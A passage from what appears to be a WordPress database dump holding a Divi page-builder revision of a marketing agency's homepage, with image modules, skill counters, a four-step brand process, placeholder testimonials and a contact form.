animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-18 21:00:43','2020-07-18 21:00:43','',134,'https://52.66.212.87/2020/07/18/134-revision-v1/',0,'revision','',0);
